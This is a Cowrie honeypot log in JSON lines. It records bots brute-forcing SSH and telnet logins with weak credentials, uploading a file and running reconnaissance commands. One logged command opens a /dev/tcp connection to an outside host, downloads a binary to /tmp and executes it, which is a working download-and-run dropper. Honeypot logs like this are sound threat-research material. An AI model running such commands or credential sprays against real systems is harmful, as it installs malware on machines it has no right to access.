{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-09-08T18:27:21.420855Z","src_ip":"212.227.235.229","session":"8414bc767647"}
{"eventid":"cowrie.login.success","username":"root","password":"debian","message":"login attempt [root/debian] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:27:22.235752Z","src_ip":"212.227.235.229","session":"8414bc767647"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":40470,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9361cbdf853","protocol":"ssh","message":"New connection: 170.64.157.139:40470 (1.2.3.4:22) [session: b9361cbdf853]","sensor":"my-vps","timestamp":"2025-09-08T18:27:58.831417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:27:58.832616Z","src_ip":"170.64.157.139","session":"b9361cbdf853"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:27:59.159575Z","src_ip":"170.64.157.139","session":"b9361cbdf853"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwe123","message":"login attempt [postgres/qwe123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:28:00.140036Z","src_ip":"170.64.157.139","session":"b9361cbdf853"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:28:01.468271Z","src_ip":"170.64.157.139","session":"b9361cbdf853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54724,"dst_ip":"1.2.3.4","dst_port":23,"session":"70883fca125a","protocol":"telnet","message":"New connection: 212.227.235.229:54724 (1.2.3.4:23) [session: 70883fca125a]","sensor":"my-vps","timestamp":"2025-09-08T18:28:19.468796Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:28:19.672857Z","src_ip":"212.227.235.229","session":"70883fca125a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:28:19.731828Z","src_ip":"212.227.235.229","session":"70883fca125a"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":38228,"dst_ip":"1.2.3.4","dst_port":22,"session":"b30d7e4c5229","protocol":"ssh","message":"New connection: 170.64.157.139:38228 (1.2.3.4:22) [session: b30d7e4c5229]","sensor":"my-vps","timestamp":"2025-09-08T18:29:18.324401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:29:18.325467Z","src_ip":"170.64.157.139","session":"b30d7e4c5229"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:29:18.585213Z","src_ip":"170.64.157.139","session":"b30d7e4c5229"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwer1234","message":"login attempt [postgres/qwer1234] failed","sensor":"my-vps","timestamp":"2025-09-08T18:29:19.364257Z","src_ip":"170.64.157.139","session":"b30d7e4c5229"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:29:20.625869Z","src_ip":"170.64.157.139","session":"b30d7e4c5229"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55342,"dst_ip":"1.2.3.4","dst_port":22,"session":"5559609654ac","protocol":"ssh","message":"New connection: 217.72.205.35:55342 (1.2.3.4:22) [session: 5559609654ac]","sensor":"my-vps","timestamp":"2025-09-08T18:30:00.229935Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:30:00.231087Z","src_ip":"217.72.205.35","session":"5559609654ac"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":56342,"dst_ip":"1.2.3.4","dst_port":22,"session":"e92b179d1d7e","protocol":"ssh","message":"New connection: 170.64.157.139:56342 (1.2.3.4:22) [session: e92b179d1d7e]","sensor":"my-vps","timestamp":"2025-09-08T18:30:35.551876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:30:35.625546Z","src_ip":"170.64.157.139","session":"e92b179d1d7e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:30:35.806772Z","src_ip":"170.64.157.139","session":"e92b179d1d7e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password123","message":"login attempt [postgres/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:30:36.832860Z","src_ip":"170.64.157.139","session":"e92b179d1d7e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:30:38.089232Z","src_ip":"170.64.157.139","session":"e92b179d1d7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:31:19.734878Z","src_ip":"212.227.235.229","session":"70883fca125a"}
{"eventid":"cowrie.session.closed","duration":180.27078580856323,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:31:19.739480Z","src_ip":"212.227.235.229","session":"70883fca125a"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":42760,"dst_ip":"1.2.3.4","dst_port":22,"session":"815e01ee550a","protocol":"ssh","message":"New connection: 170.64.157.139:42760 (1.2.3.4:22) [session: 815e01ee550a]","sensor":"my-vps","timestamp":"2025-09-08T18:31:49.107632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:31:49.108528Z","src_ip":"170.64.157.139","session":"815e01ee550a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:31:49.368888Z","src_ip":"170.64.157.139","session":"815e01ee550a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty123456","message":"login attempt [postgres/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:31:50.201921Z","src_ip":"170.64.157.139","session":"815e01ee550a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:31:51.467057Z","src_ip":"170.64.157.139","session":"815e01ee550a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37135,"dst_ip":"1.2.3.4","dst_port":23,"session":"a86b4934da33","protocol":"telnet","message":"New connection: 212.227.235.229:37135 (1.2.3.4:23) [session: a86b4934da33]","sensor":"my-vps","timestamp":"2025-09-08T18:32:10.971367Z"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sensor":"my-vps","timestamp":"2025-09-08T18:32:22.249419Z","src_ip":"212.227.235.229","session":"8414bc767647"}
{"eventid":"cowrie.session.closed","duration":"307.2","message":"Connection lost after 307.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:32:22.250328Z","src_ip":"212.227.235.229","session":"8414bc767647"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52746,"dst_ip":"1.2.3.4","dst_port":22,"session":"5239c78e6c6c","protocol":"ssh","message":"New connection: 212.227.125.160:52746 (1.2.3.4:22) [session: 5239c78e6c6c]","sensor":"my-vps","timestamp":"2025-09-08T18:32:38.551765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-phpseclib_1.0 (openssl)","message":"Remote SSH version: SSH-2.0-phpseclib_1.0 (openssl)","sensor":"my-vps","timestamp":"2025-09-08T18:32:38.552366Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.client.kex","hassh":"89da11ae925d8e42f773c1908a42c97c","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,twofish128-ctr,twofish192-ctr,twofish256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,twofish128-cbc,twofish192-cbc,twofish256-cbc,twofish-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc;hmac-sha2-256,hmac-sha1-96,hmac-sha1,hmac-md5-96,hmac-md5;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","twofish128-ctr","twofish192-ctr","twofish256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","twofish128-cbc","twofish192-cbc","twofish256-cbc","twofish-cbc","blowfish-ctr","blowfish-cbc","3des-ctr","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1-96","hmac-sha1","hmac-md5-96","hmac-md5"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 89da11ae925d8e42f773c1908a42c97c","sensor":"my-vps","timestamp":"2025-09-08T18:32:38.788127Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@123","message":"login attempt [root/Root@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:32:39.822081Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.client.size","width":80,"height":24,"message":"Terminal Size: 80 24","sensor":"my-vps","timestamp":"2025-09-08T18:32:40.353155Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:32:40.589366Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.session.closed","duration":31.338282346725464,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:32:42.309582Z","src_ip":"212.227.235.229","session":"a86b4934da33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"9.8","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 9.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:32:50.362185Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:32:51.130011Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T18:32:51.130918Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:32:51.368138Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:32:51.369246Z","src_ip":"212.227.125.160","session":"5239c78e6c6c"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":56364,"dst_ip":"1.2.3.4","dst_port":22,"session":"820c10533b14","protocol":"ssh","message":"New connection: 170.64.157.139:56364 (1.2.3.4:22) [session: 820c10533b14]","sensor":"my-vps","timestamp":"2025-09-08T18:32:59.886833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:32:59.983541Z","src_ip":"170.64.157.139","session":"820c10533b14"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:33:00.186769Z","src_ip":"170.64.157.139","session":"820c10533b14"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234qwer","message":"login attempt [postgres/1234qwer] failed","sensor":"my-vps","timestamp":"2025-09-08T18:33:01.384664Z","src_ip":"170.64.157.139","session":"820c10533b14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44622,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e6899c13dd4","protocol":"telnet","message":"New connection: 212.227.125.160:44622 (1.2.3.4:23) [session: 5e6899c13dd4]","sensor":"my-vps","timestamp":"2025-09-08T18:33:01.917896Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:33:02.004118Z","src_ip":"212.227.125.160","session":"5e6899c13dd4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:33:02.064173Z","src_ip":"212.227.125.160","session":"5e6899c13dd4"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:33:02.686091Z","src_ip":"170.64.157.139","session":"820c10533b14"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":56298,"dst_ip":"1.2.3.4","dst_port":22,"session":"a884db8d4655","protocol":"ssh","message":"New connection: 8.138.136.155:56298 (1.2.3.4:22) [session: a884db8d4655]","sensor":"my-vps","timestamp":"2025-09-08T18:33:41.362778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T18:33:41.363627Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T18:33:41.364441Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:33:42.063892Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:33:43.285574Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:33:43.789210Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T18:33:43.791221Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hU7jcBwNhu && chmod +x /tmp/hU7jcBwNhu && /tmp/hU7jcBwNhu uKU6oAjz9RS8N7XXwbc4uArz9gKuM7fA17Q2uhTz+gqgMLPDz7Uzvg3i8wy2LLTIwKszuQns9gK0NLXIzbcithTz8QKgM7bP17Q3uwD08gu/Mx9agNlBd7V7V4Lf5js3\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hU7jcBwNhu && chmod +x /tmp/hU7jcBwNhu && /tmp/hU7jcBwNhu uKU6oAjz9RS8N7XXwbc4uArz9gKuM7fA17Q2uhTz+gqgMLPDz7Uzvg3i8wy2LLTIwKszuQns9gK0NLXIzbcithTz8QKgM7bP17Q3uwD08gu/Mx9agNlBd7V7V4Lf5js3\" &","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.021698Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/Da1t9PhtRZ","message":"CMD: head -c 1458464 > /tmp/Da1t9PhtRZ","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.025208Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
